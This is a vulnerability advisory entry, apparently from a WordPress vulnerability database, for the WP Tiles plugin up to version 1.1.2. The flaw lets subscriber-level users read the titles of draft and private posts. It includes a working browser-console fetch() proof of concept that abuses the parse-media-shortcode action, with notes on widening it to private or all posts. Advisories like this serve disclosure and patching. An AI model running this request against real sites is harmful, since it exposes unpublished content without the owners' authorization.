Lucene search

K
wpexploitWpvulndbWPEX-ID:FDD79BB4-D434-4635-BB2B-84D079ECC746
HistoryMar 16, 2023 - 12:00 a.m.

WP Tiles <= 1.1.2 - Subscriber+ Draft/Private Post Title Disclosure

2023-03-1600:00:00
wpvulndb
56
wp tiles
subscriber
draft
private post
title disclosure
command execution
web browser
exploit

0.001 Low

EPSS

Percentile

29.8%

The plugin does not ensure that posts to be displayed are not draft/private, allowing any authenticated users, such as subscriber to retrieve the titles of draft and privates posts for example. AN attacker could also retrieve the title of any other type of post.

Run the below command in the developer console of the web browser while being on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[wp-tiles post_status='draft']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

This will display the titles of all draft posts. Change post_status to private for private posts, or any to list everything

0.001 Low

EPSS

Percentile

29.8%

Related for WPEX-ID:FDD79BB4-D434-4635-BB2B-84D079ECC746